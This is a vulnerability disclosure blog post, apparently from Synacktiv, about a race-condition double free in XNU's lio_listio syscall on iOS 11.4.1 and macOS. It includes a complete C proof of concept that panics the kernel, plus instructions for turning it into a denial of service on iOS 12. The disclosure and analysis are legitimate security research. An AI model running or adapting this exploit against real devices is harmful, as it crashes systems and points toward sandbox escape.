A Race for an iOS/macOS Sandbox Escape

October 8, 2019
Notes

Introduction

TL;DR: disclosure of an iOS 11.4.1 kernel vulnerability in lio_listio, together with a PoC that panics the kernel.

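iOS 12 was released a few weeks ago and brought many security fixes and improvements. In particular, this new version happens to patch a nice kernel vulnerability that we discovered at Synacktiv.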

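It is not clear whether this bug was found internally by Apple or whether it is CVE-2018-4344, which was reported by the UK's National Cyber Security Centre (NCSC). Since nobody seems to have published anything about it yet, let's analyze it in detail in this blog post!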

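The vulnerability lies in the lio_listio system call and is triggered by a race condition. It can effectively be used to free a kernel object twice, leading to a potential use-after-free (UAF).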

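The bug itself was introduced about nine years ago, between xnu-1228 and xnu-1456, and should be usable on most multi-core iOS devices up to and including iOS 11.4.1, and on macOS up to the release of 10.14. Internally, we named the bug LightSpeed, because we win a very tight race condition (and as an excuse to add some Star Wars memes), but don't worry, we will not make a logo for it.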

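Because the lio_listio syscall is reachable from any sandbox, and because the bug provides some interesting primitives, LightSpeed could possibly be used to jailbreak iOS 11.4.1. This post, however, only explains the bug and provides code that triggers a kernel panic.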

Introduction to the AIO system calls

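As defined in POSIX.1b, the XNU kernel offers userspace several system calls to perform asynchronous I/O (aio). The standard specifies a variety of functions, such as aio_read(), aio_write(), lio_listio(), aio_error(), aio_return(), ... These syscalls have been implemented in bsd/kern/kern_aio.c since at least XNU-517, and most of the related structures are declared in bsd/sys/aio.h.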

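As an introduction to the AIO family, aio_read() and aio_write() are the asynchronous versions of the read() and write() syscalls, respectively. Both functions expect a struct aiocb * describing the I/O request to perform: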

struct aiocb {
    int             aio_fildes;     /* File descriptor */
    off_t           aio_offset;     /* File offset */
    volatile void  *aio_buf;        /* Location of buffer */
    size_t          aio_nbytes;     /* Length of transfer */
    int             aio_reqprio;    /* Request priority offset */
    struct sigevent aio_sigevent;   /* Signal number and value */
    int             aio_lio_opcode; /* Operation to be performed */
};

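To carry out an I/O request, XNU first converts the user structure into an aio_workq_entry through aio_create_queue_entry(). The kernel then enqueues the created object into the system-wide aio queue with aio_enqueue_work(). Here are the prototypes of both functions: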

static aio_workq_entry *aio_create_queue_entry(proc_t procp, user_addr_t aiocbp,
                                               void *group_tag, int kindOfIO);

static void aio_enqueue_work(proc_t procp, aio_workq_entry *entryp, int proc_locked);

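Once enqueued, the scheduled work is ready to be picked up and processed by the aio workers, which are kernel threads running aio_work_thread(). The aio_read() and aio_write() syscalls can therefore return immediately, and the status of the aio can be queried later with aio_return() and aio_error().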

lio_listio

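With that introduction out of the way, let's talk about lio_listio(). This syscall is similar to aio_read() and aio_write(), but it is designed to schedule a whole list of aio in a single call. It therefore takes an array of aiocb pointers along with a few other parameters.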

int lio_listio(int mode, struct aiocb *restrict const list[restrict],
               int nent, struct sigevent *restrict sig);

The mode argument specifies the behavior of the syscall and must be one of the following:

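LIO_NOWAIT: the aio are scheduled and the syscall returns immediately (asynchronous);
LIO_WAIT: the aio are scheduled and the syscall waits for all of them to complete (synchronous).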

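In the LIO_WAIT case, the kernel has to keep track of the whole batch of aio. Indeed, once the last I/O has been processed, the aio worker thread needs to wake up the user thread that is still waiting in the syscall.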

To do so, the kernel allocates a struct aio_lio_context to track the batch of I/O (this is done in both modes):

struct aio_lio_context {
    int io_waiter;
    int io_issued;
    int io_completed;
};
typedef struct aio_lio_context aio_lio_context;

Here is the relevant part of the lio_listio implementation (most of it has been stripped):

int lio_listio(proc_t p, struct lio_listio_args *uap, int *retval )
{
    /* lio_context allocation */
    MALLOC(lio_context, aio_lio_context*, sizeof(aio_lio_context), M_TEMP, M_WAITOK);

    /* userland extraction */
    aiocbpp = aio_copy_in_list(p, uap->aiocblist, uap->nent);

    lio_context->io_issued = uap->nent;

    for ( i = 0; i < uap->nent; i++ ) {
        user_addr_t my_aiocbp;
        aio_workq_entry *entryp;

        *(entryp_listp + i) = NULL;
        my_aiocbp = *(aiocbpp + i);

        /* creation of the aio_workq_entry */
        /* lio_create_entry is a wrapper for aio_create_queue_entry */
        result = lio_create_entry(p, my_aiocbp, lio_context, (entryp_listp+i));
        if ( result != 0 && call_result == -1 )
            call_result = result;

        entryp = *(entryp_listp + i);

        aio_proc_lock_spin(p);
        // [...]
        /* enqueing of the aio_workq_*/
        lck_mtx_convert_spin(aio_proc_mutex(p));
        aio_enqueue_work(p, entryp, 1);
        aio_proc_unlock(p);
    }

    // [...]
}

Here we can see that the lio_context is tagged onto every aio_workq_entry (as the group_tag parameter of aio_create_queue_entry()). Later, the aio worker thread retrieves this context, updates lio_context->io_completed, and wakes up the user thread if needed.

The bug: LightSpeed!

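We explained how the aio_lio_context is used in the previous section, but one question remains: who is responsible for freeing the context? It depends on the mode of operation.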

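When lio_listio is called in LIO_NOWAIT mode, the thread in the syscall does not wait for all the I/O to complete, so freeing the lio_context is the job of the aio workers. This is done in the do_aio_completion routine, once the last aio has been processed: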

static void do_aio_completion( aio_workq_entry *entryp )
{
    // [...]
    lio_context = (aio_lio_context *)entryp->group_tag;

    if (lio_context != NULL) {

        aio_proc_lock_spin(entryp->procp);
        lio_context->io_completed++;

        if (lio_context->io_issued == lio_context->io_completed) {
            lastLioCompleted = TRUE;
        }

        waiter = lio_context->io_waiter;

        /* explicit wakeup of lio_listio() waiting in LIO_WAIT */
        if ((entryp->flags & AIO_LIO_NOTIFY) && (lastLioCompleted) && (waiter != 0)) {
            /* wake up the waiter */
            wakeup(lio_context);
        }

        aio_proc_unlock(entryp->procp);
    }

    // [...]
    if (lastLioCompleted && (waiter == 0))
        free_lio_context (lio_context);

} /* do_aio_completion */

On the other hand, when the caller waits in LIO_WAIT mode, the lio_context is freed in lio_listio. Here is the relevant part at the end of the syscall:

int lio_listio(proc_t p, struct lio_listio_args *uap, int *retval )
{
    // [...]

    switch(uap->mode) {
    case LIO_WAIT:
        aio_proc_lock_spin(p);
        while (lio_context->io_completed < lio_context->io_issued) {
            result = msleep(lio_context, aio_proc_mutex(p), /*...*/);

            // [...]
        }

        /* If all IOs have finished must free it */
        if (lio_context->io_completed == lio_context->io_issued) {
            free_context = TRUE;
        }

        aio_proc_unlock(p);
        break;

    case LIO_NOWAIT:
        break;
    }

    // [...]

ExitRoutine:
    if ( entryp_listp != NULL )
        FREE( entryp_listp, M_TEMP );
    if ( aiocbpp != NULL )
        FREE( aiocbpp, M_TEMP );
    if ((lio_context != NULL) &&
        ((lio_context->io_issued == 0) || (free_context == TRUE))) {
        free_lio_context(lio_context);
    }

    // [...]

    return( call_result );

} /* lio_listio */

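The previous code contains a subtle bug that can be triggered in LIO_NOWAIT mode. The last test, (lio_context->io_issued == 0), is an error-handling case that frees the context when no I/O has been scheduled. This can happen, for instance, when the user submits I/O requests that all have LIO_NOP as aio_lio_opcode (instead of LIO_READ or LIO_WRITE).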

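However, at this point of the execution the check is wrong: the lio_context is not guaranteed to be valid anymore, since other kernel threads may already have tampered with it.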

Here comes the key part!

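If the aio workers are really fast and manage to execute all our I/O before the end of the syscall, the lio_context may already have been freed and reused. Indeed, once an aio is scheduled, a worker only needs the caller's p_mlock to start working, and lio_listio releases that lock several times.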

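Therefore, if the lio_context has been freed and reused, lio_context->io_issued may be zero. In that case, lio_listio ends with another call to free_lio_context() and ends up freeing another kernel allocation.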

Crash PoC

To sum up, the following sequence is needed to trigger the bug:

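1. Call lio_listio() to allocate an aio_lio_context and schedule some aio, then get context-switched before the end of the syscall;
2. The aio worker threads execute all the scheduled I/O and free the aio_lio_context;
3. An allocation from the kalloc.16 zone (the size class of aio_lio_context) reuses the chunk that held the aio_lio_context;
4. A zero is written to the second dword of that allocation (so that lio_context->io_issued == 0);
5. A context switch resumes the suspended lio_listio call, which then frees the allocation.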

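Steps 3 and 4 are mandatory. Indeed, because of the size of the allocation (kalloc.16), a freed chunk always ends up poisoned (in zfree()), so lio_context->io_issued cannot be zero in step 5 unless the chunk has been reused. After step 5, if the new owner does not hold on to the allocation and the kernel tries to free it again, the system panics.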

The following code demonstrates this panic (GitHub link: https://github.com/synacktiv/lightspeed):

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <aio.h>
#include <sys/errno.h>
#include <pthread.h>
#include <poll.h>

/* might have to play with those a bit */
#if MACOS_BUILD
#define NB_LIO_LISTIO 1
#define NB_RACER 5
#else
#define NB_LIO_LISTIO 1
#define NB_RACER 30
#endif

#define NENT 1

void *anakin(void *a)
{
    printf("Now THIS is podracing!\n");

    uint64_t err;

    int mode = LIO_NOWAIT;
    int nent = NENT;
    char buf[NENT];
    void *sigp = NULL;

    struct aiocb** aio_list = NULL;
    struct aiocb*  aios = NULL;

    char path[1024] = {0};
#if MACOS_BUILD
    snprintf(path, sizeof(path), "/tmp/lightspeed");
#else
    snprintf(path, sizeof(path), "%slightspeed", getenv("TMPDIR"));
#endif

    int fd = open(path, O_RDWR|O_CREAT, S_IRWXU|S_IRWXG|S_IRWXO);
    if (fd < 0)
    {
        perror("open");
        goto exit;
    }

    /* prepare real aio */
    aio_list = malloc(nent * sizeof(*aio_list));
    if (aio_list == NULL)
    {
        perror("malloc");
        goto exit;
    }

    aios = malloc(nent * sizeof(*aios));
    if (aios == NULL)
    {
        perror("malloc");
        goto exit;
    }

    memset(aios, 0, nent * sizeof(*aios));
    for(uint32_t i = 0; i < nent; i++)
    {
        struct aiocb* aio = &aios[i];

        aio->aio_fildes = fd;
        aio->aio_offset = 0;
        aio->aio_buf = &buf[i];
        aio->aio_nbytes = 1;
        aio->aio_lio_opcode = LIO_READ; // change that to LIO_NOP for a DoS :D
        aio->aio_sigevent.sigev_notify = SIGEV_NONE;

        aio_list[i] = aio;
    }

    while(1)
    {
        err = lio_listio(mode, aio_list, nent, sigp);

        for(uint32_t i = 0; i < nent; i++)
        {
            /* check the return err of the aio to fully consume it */
            while(aio_error(aio_list[i]) == EINPROGRESS) {
                usleep(100);
            }
            err = aio_return(aio_list[i]);
        }
    }

exit:
    if(fd >= 0)
        close(fd);

    if(aio_list != NULL)
        free(aio_list);

    if(aios != NULL)
        free(aios);

    return NULL;
}

void *sebulba(void *a)
{
    printf("You're Bantha poodoo!\n");
    while(1)
    {
        /* not mandatory but used to make the race more likely */
        /* this poll() will force a kalloc16 of a struct poll_continue_args */
        /* with its second dword as 0 (to collide with lio_context->io_issued == 0) */
        /* this technique is quite slow (1ms waiting time) and better ways to do so exist */
        int n = poll(NULL, 0, 1);
        if(n != 0)
        {
            /* when the race plays perfectly we might detect it before the crash */
            /* most of the time though, we will just panic without going here */
            printf("poll: %x - kernel crash incoming!\n",n);
        }
    }

    return 0;
}

void crash_kernel()
{
    pthread_t *lio_listio_threads = malloc(NB_LIO_LISTIO * sizeof(*lio_listio_threads));
    if (lio_listio_threads == NULL)
    {
        perror("malloc");
        goto exit;
    }

    pthread_t *racers_threads = malloc(NB_RACER  * sizeof(*racers_threads));
    if (racers_threads == NULL)
    {
        perror("malloc");
        goto exit;
    }

    memset(racers_threads, 0, NB_RACER * sizeof(*racers_threads));
    memset(lio_listio_threads, 0, NB_LIO_LISTIO * sizeof(*lio_listio_threads));

    for(uint32_t i = 0; i < NB_RACER; i++)
    {
        pthread_create(&racers_threads[i], NULL, sebulba, NULL);
    }
    for(uint32_t i = 0; i < NB_LIO_LISTIO; i++)
    {
        pthread_create(&lio_listio_threads[i], NULL, anakin, NULL);
    }

    for(uint32_t i = 0; i < NB_RACER; i++)
    {
        pthread_join(racers_threads[i], NULL);
    }
    for(uint32_t i = 0; i < NB_LIO_LISTIO; i++)
    {
        pthread_join(lio_listio_threads[i], NULL);
    }

exit:
    return;
}

#if MACOS_BUILD
int main(int argc, char* argv[])
{
    crash_kernel();

    return 0;
}
#endif

Fix and conclusion

Although the latest published XNU source (4570.71.2) is still vulnerable, the bug has been fixed in iOS 12 (at least since beta 4).

Here is the Hex-Rays Decompiler output for the end of the syscall:

This code is probably the result of compiling the following:

if ((free_context == TRUE) && (lio_context != NULL)) {
    free_lio_context(lio_context);
}

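On one hand, this patch fixes the potential UAF on the lio_context. On the other hand, the error case that was handled before the fix is now ignored... It is therefore possible to make lio_listio() allocate an aio_lio_context that the kernel will never free. This gives us a small DoS that makes recent kernels (including iOS 12) stop responding.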

To test it, just change LIO_READ to LIO_NOP in the PoC and set NB_RACER to 0.

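Finally, we are happy to disclose this bug in this blog post, and we hope you enjoyed it. The bug is still triggerable on iOS 11.4.1, so one could try to build a jailbreak from it (although it would probably be easier with other vulnerabilities that have already been disclosed).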

As for the rest, time will tell whether Apple fixes the small DoS they introduced with their patch :D

Many thanks to my colleagues for their help with this blog post.

Original article: https://www.synacktiv.com/posts/exploit/lightspeed-a-race-for-an-iosmacos-sandbox-escape.html?tdsourcetag=spcqqaiomsg